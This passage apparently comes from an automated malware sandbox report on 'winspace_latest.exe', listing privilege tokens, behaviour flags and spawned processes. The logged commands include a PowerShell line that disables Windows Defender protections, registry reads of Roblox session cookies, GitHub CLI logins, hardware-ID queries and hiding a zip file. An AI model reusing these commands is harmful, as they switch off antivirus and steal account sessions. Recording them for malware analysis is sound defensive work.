| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\BraveSoftware\Brave-Browser\Application\brave.exe | N/A |
| N/A | N/A | C:\Users\Admin\Downloads\MBSetup.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\winspace_latest.exe
"C:\Users\Admin\AppData\Local\Temp\winspace_latest.exe"
C:\Users\Admin\AppData\Roaming\WinSpace\WinSpace.exe
"C:\Users\Admin\AppData\Roaming\WinSpace\WinSpace.exe"
C:\Users\Admin\AppData\Roaming\WinSpace\WinSpace.exe
"C:\Users\Admin\AppData\Roaming\WinSpace\WinSpace.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c title WinSpace [Elyx] [1.0]
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "winspace_api.exe -e 2344aiusdefplk"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c gh auth status > lg/lg_status.lg
C:\Users\Admin\AppData\Roaming\WinSpace\winspace_api.exe
winspace_api.exe -e 2344aiusdefplk
C:\Users\Admin\AppData\Roaming\WinSpace\gh.exe
gh auth status
C:\Windows\system32\tzutil.exe
tzutil /g
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c gh auth login -p ssh -w --insecure-storage --skip-ssh-key
C:\Users\Admin\AppData\Roaming\WinSpace\gh.exe
gh auth login -p ssh -w --insecure-storage --skip-ssh-key
C:\Windows\system32\tzutil.exe
tzutil /g
C:\Windows\system32\tzutil.exe
tzutil /g
C:\Users\Admin\AppData\Roaming\WinSpace\winspace_api.exe
winspace_api.exe -e 2344aiusdefplk
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/login/device
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd2eec46f8,0x7ffd2eec4708,0x7ffd2eec4718
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,18385325089410734088,15239658787980120439,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2240 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,18385325089410734088,15239658787980120439,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2304 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,18385325089410734088,15239658787980120439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2760 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,18385325089410734088,15239658787980120439,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,18385325089410734088,15239658787980120439,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2160 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c attrib +h ./"Golden-Admin.zip"
C:\Windows\system32\attrib.exe
attrib +h ./"Golden-Admin.zip"
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,18385325089410734088,15239658787980120439,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5156 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,18385325089410734088,15239658787980120439,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5156 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,18385325089410734088,15239658787980120439,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5152 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,18385325089410734088,15239658787980120439,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3932 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd30e1ab58,0x7ffd30e1ab68,0x7ffd30e1ab78
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1784 --field-trial-handle=2068,i,5165947601630891963,11166185580578336797,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2012 --field-trial-handle=2068,i,5165947601630891963,11166185580578336797,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2220 --field-trial-handle=2068,i,5165947601630891963,11166185580578336797,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3148 --field-trial-handle=2068,i,5165947601630891963,11166185580578336797,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3164 --field-trial-handle=2068,i,5165947601630891963,11166185580578336797,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4372 --field-trial-handle=2068,i,5165947601630891963,11166185580578336797,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4560 --field-trial-handle=2068,i,5165947601630891963,11166185580578336797,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4720 --field-trial-handle=2068,i,5165947601630891963,11166185580578336797,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4664 --field-trial-handle=2068,i,5165947601630891963,11166185580578336797,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4624 --field-trial-handle=2068,i,5165947601630891963,11166185580578336797,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5048 --field-trial-handle=2068,i,5165947601630891963,11166185580578336797,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=4200 --field-trial-handle=2068,i,5165947601630891963,11166185580578336797,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4968 --field-trial-handle=2068,i,5165947601630891963,11166185580578336797,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4960 --field-trial-handle=2068,i,5165947601630891963,11166185580578336797,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3200 --field-trial-handle=2068,i,5165947601630891963,11166185580578336797,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --mojo-platform-channel-handle=2396 --field-trial-handle=2068,i,5165947601630891963,11166185580578336797,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --mojo-platform-channel-handle=4884 --field-trial-handle=2068,i,5165947601630891963,11166185580578336797,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=4436 --field-trial-handle=2068,i,5165947601630891963,11166185580578336797,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3136 --field-trial-handle=2068,i,5165947601630891963,11166185580578336797,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5172 --field-trial-handle=2068,i,5165947601630891963,11166185580578336797,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5200 --field-trial-handle=2068,i,5165947601630891963,11166185580578336797,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 --field-trial-handle=2068,i,5165947601630891963,11166185580578336797,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5408 --field-trial-handle=2068,i,5165947601630891963,11166185580578336797,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5416 --field-trial-handle=2068,i,5165947601630891963,11166185580578336797,131072 /prefetch:8
C:\Users\Admin\Downloads\BraveBrowserSetup-BRV010.exe
"C:\Users\Admin\Downloads\BraveBrowserSetup-BRV010.exe"
C:\Program Files (x86)\BraveSoftware\Temp\GUMDD4C.tmp\BraveUpdate.exe
"C:\Program Files (x86)\BraveSoftware\Temp\GUMDD4C.tmp\BraveUpdate.exe" /installsource taggedmi /install "appguid={AFE6A462-C574-4B8A-AF43-4CC60DF4563B}&appname=Brave-Release&needsadmin=prefers&ap=release&installdataindex=default&referral=none"
C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe
"C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe" /regsvc
C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe
"C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe" /regserver
C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe
"C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe"
C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe
"C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe"
C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe
"C:\Program Files (x86)\BraveSoftware\Update\1.3.361.149\BraveUpdateComRegisterShell64.exe"
C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe
"C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4zNjEuMTQ5IiBzaGVsbF92ZXJzaW9uPSIxLjMuMzYxLjE0OSIgaXNtYWNoaW5lPSIxIiBzZXNzaW9uaWQ9Ins5RDMyNkU4Qi02MTU3LTQzNEUtQUU0MS0zQkYzMEQ2RDE1MkN9IiBpbnN0YWxsc291cmNlPSJ0YWdnZWRtaSIgdGVzdHNvdXJjZT0iYXV0byIgcmVxdWVzdGlkPSJ7MDExMkVBNDctRUQyNC00QjhFLUJEQjItNDUwNTNDMzY0OTMxfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBwaHlzbWVtb3J5PSI4IiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjE5MDQxLjEyODgiIHNwPSIiIGFyY2g9Ing2NCIvPjxhcHAgYXBwaWQ9IntCMTMxQzkzNS05QkU2LTQxREEtOTU5OS0xRjc3NkJFQjgwMTl9IiB2ZXJzaW9uPSIiIG5leHR2ZXJzaW9uPSIxLjMuMzYxLjE0OSIgbGFuZz0iIiBicmFuZD0iIiBjbGllbnQ9IiI-PGV2ZW50IGV2ZW50dHlwZT0iMiIgZXZlbnRyZXN1bHQ9IjEiIGVycm9yY29kZT0iMCIgZXh0cmFjb2RlMT0iMCIgaW5zdGFsbF90aW1lX21zPSI2NTAiLz48L2FwcD48L3JlcXVlc3Q-
C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe
"C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe" /handoff "appguid={AFE6A462-C574-4B8A-AF43-4CC60DF4563B}&appname=Brave-Release&needsadmin=prefers&ap=release&installdataindex=default&referral=none" /installsource taggedmi /sessionid "{9D326E8B-6157-434E-AE41-3BF30D6D152C}"
C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe
"C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe" /svc
C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\brave_installer-x64.exe
"C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\brave_installer-x64.exe" --do-not-launch-chrome /installerdata="C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\gui2E7B.tmp"
C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\CR_80A1B.tmp\setup.exe
"C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\CR_80A1B.tmp\setup.exe" --install-archive="C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\CR_80A1B.tmp\CHROME.PACKED.7Z" --do-not-launch-chrome /installerdata="C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\gui2E7B.tmp" --brave-referral-code="BRV010"
C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\CR_80A1B.tmp\setup.exe
"C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\CR_80A1B.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://cr.brave.com --annotation=plat=Win64 --annotation=prod=Brave --annotation=ver=125.1.66.118 --initial-client-data=0x274,0x278,0x27c,0x250,0x280,0x7ff79a8befe0,0x7ff79a8befec,0x7ff79a8beff8
C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\CR_80A1B.tmp\setup.exe
"C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\CR_80A1B.tmp\setup.exe" --system-level --verbose-logging --installerdata="C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\gui2E7B.tmp" --create-shortcuts=0 --install-level=1
C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\CR_80A1B.tmp\setup.exe
"C:\Program Files (x86)\BraveSoftware\Update\Install\{6B9F1F08-E785-48C3-9C5E-9E80B519D2EC}\CR_80A1B.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://cr.brave.com --annotation=plat=Win64 --annotation=prod=Brave --annotation=ver=125.1.66.118 --initial-client-data=0x274,0x278,0x27c,0x250,0x280,0x7ff79a8befe0,0x7ff79a8befec,0x7ff79a8beff8
C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe
